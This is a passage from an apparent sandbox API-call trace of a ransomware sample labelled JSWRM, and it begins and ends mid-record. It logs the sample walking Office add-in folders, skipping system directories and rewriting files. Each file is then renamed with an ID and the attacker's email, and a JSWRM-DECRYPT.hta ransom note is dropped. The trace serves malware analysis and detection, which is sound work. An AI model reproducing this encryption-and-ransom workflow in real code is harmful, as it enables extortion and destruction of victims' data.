ftCreationTime.dwLowDateTime=0x166ea6b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x166ea6b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16710914, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x76a1, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Sybase.xsl", cAlternateFileName="")) returned 1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2=".") returned 1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="..") returned 1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="...") returned 1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="windows") returned -1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="recovery") returned 1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="perflogs") returned 1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="documents and settings") returned 1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="$RECYCLE.BIN") returned 1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="system volume information") returned -1 [0126.199] lstrcmpiW (lpString1="Sybase.xsl", lpString2="msocache") returned 1 [0126.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0126.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sybase.xsl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sybase.xsl", cchWideChar=10, lpMultiByteStr=0x345e508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sybase.xsl", lpUsedDefaultChar=0x0) returned 10 [0126.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0126.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0126.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sybase.xsl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0126.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sybase.xsl", cchWideChar=10, lpMultiByteStr=0x345e4d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sybase.xsl", lpUsedDefaultChar=0x0) returned 10 [0126.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0126.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0126.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0126.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0126.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.200] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=30369) returned 1 [0126.200] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76a0) returned 0x278330 [0126.200] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x76a0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x76a0, lpOverlapped=0x0) returned 1 [0126.204] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.204] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x76a0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x76a0, lpOverlapped=0x0) returned 1 [0126.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.204] CloseHandle (hObject=0x338) returned 1 [0126.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0126.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0126.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0126.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0126.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sybase.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\Sybase.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\sybase.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0126.206] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1662bb01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16651cf9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6c42, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="trdtv2r41.xsl", cAlternateFileName="TRDTV2~1.XSL")) returned 1 [0126.206] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2=".") returned 1 [0126.206] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="..") returned 1 [0126.206] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="...") returned 1 [0126.206] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="windows") returned -1 [0126.206] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="recovery") returned 1 [0126.206] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="perflogs") returned 1 [0126.206] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="documents and settings") returned 1 [0126.206] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="$RECYCLE.BIN") returned 1 [0126.207] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="system volume information") returned 1 [0126.207] lstrcmpiW (lpString1="trdtv2r41.xsl", lpString2="msocache") returned 1 [0126.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trdtv2r41.xsl", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trdtv2r41.xsl", cchWideChar=13, lpMultiByteStr=0x345e508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trdtv2r41.xsl", lpUsedDefaultChar=0x0) returned 13 [0126.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0126.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trdtv2r41.xsl", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0126.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trdtv2r41.xsl", cchWideChar=13, lpMultiByteStr=0x345e4d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trdtv2r41.xsl", lpUsedDefaultChar=0x0) returned 13 [0126.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0126.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0126.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0126.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\trdtv2r41.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\trdtv2r41.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.208] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=27714) returned 1 [0126.208] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6c40) returned 0x278330 [0126.208] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x6c40, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x6c40, lpOverlapped=0x0) returned 1 [0126.211] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.211] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x6c40, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x6c40, lpOverlapped=0x0) returned 1 [0126.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.211] CloseHandle (hObject=0x338) returned 1 [0126.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0126.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0126.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0126.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0126.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\trdtv2r41.xsl" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\trdtv2r41.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Cartridges\\trdtv2r41.xsl.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cartridges\\trdtv2r41.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.213] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1662bb01, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1662bb01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16651cf9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6c42, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="trdtv2r41.xsl", cAlternateFileName="TRDTV2~1.XSL")) returned 0 [0126.213] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0126.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0126.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0126.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0126.213] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16651cf9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16651cf9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0126.213] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="...") returned 1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="windows") returned -1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="recovery") returned -1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="perflogs") returned -1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="documents and settings") returned -1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="$RECYCLE.BIN") returned 1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="system volume information") returned -1 [0126.213] lstrcmpiW (lpString1="cs", lpString2="msocache") returned -1 [0126.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0126.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0126.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0126.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0126.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0126.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0126.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\jswrm-decrypt.hta")) returned 0xffffffff [0126.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0126.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x278330 [0126.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x27a100 [0126.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0126.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0126.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0126.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0126.247] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.247] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0126.248] CloseHandle (hObject=0x314) returned 1 [0126.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0126.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27a100 | out: hHeap=0x1e0000) returned 1 [0126.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0126.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0126.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0126.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0126.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0126.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0126.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0126.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\jswrm-decrypt.hta")) returned 0x20 [0126.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0126.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0126.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0126.248] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16651cf9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41e801f7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0126.248] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0126.248] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16651cf9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x41e801f7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="..", cAlternateFileName="")) returned 1 [0126.249] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.249] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.249] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41e801f7, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x41e801f7, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x41e801f7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.249] 